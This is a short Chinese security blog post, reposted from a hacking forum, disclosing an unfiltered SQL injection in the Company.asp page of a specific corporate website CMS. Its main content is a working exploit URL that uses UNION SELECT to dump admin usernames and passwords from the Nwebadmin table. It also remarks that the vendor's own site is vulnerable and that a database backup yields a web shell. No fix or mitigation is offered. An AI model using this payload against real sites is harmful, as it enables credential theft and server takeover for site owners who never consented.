企成电气公司企业网站管理系统v1.0(中英文版)漏洞

  • A+
所属分类:lcx

话说天天看90sec的大牛们无聊乱丢Oday,小菜我等实在是诚惶诚恐啊。。。

在站长之家下了个小程序,一个简单的漏洞。。大牛莫笑,,不要踩俺。。谢谢。。

文件:Company.asp


什么都没过滤。。

exp:

Company.asp?id=2 union select 1,username,password,4,5,6,7,8 from Nwebadmin

官网也存在。。

备份数据库可以拿到shell。

PS:chmodx大大真的是个好人,教会了我很多。爱死他了~~~~~

转自:http://www.90sec.org/thread-1640-1-1.html

文章来源于lcx.cc:企成电气公司企业网站管理系统v1.0(中英文版)漏洞

相关推荐: 使用WiFi真的有那么危险吗?安全科普:教你增强自己的无线网络安全

0x00 背景 在知乎专栏上看到一篇文章《WiFi里的猫腻》,作者继续之前宣传的路由威胁,在互联网上疯传,搞得周围好多不懂的朋友一直问: 路由这么危险,我该怎么办啊??? 在这篇文章之前,作者及其团队成员就已经开始宣传路由的危险,似乎每个人用路由的人都会被别人…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: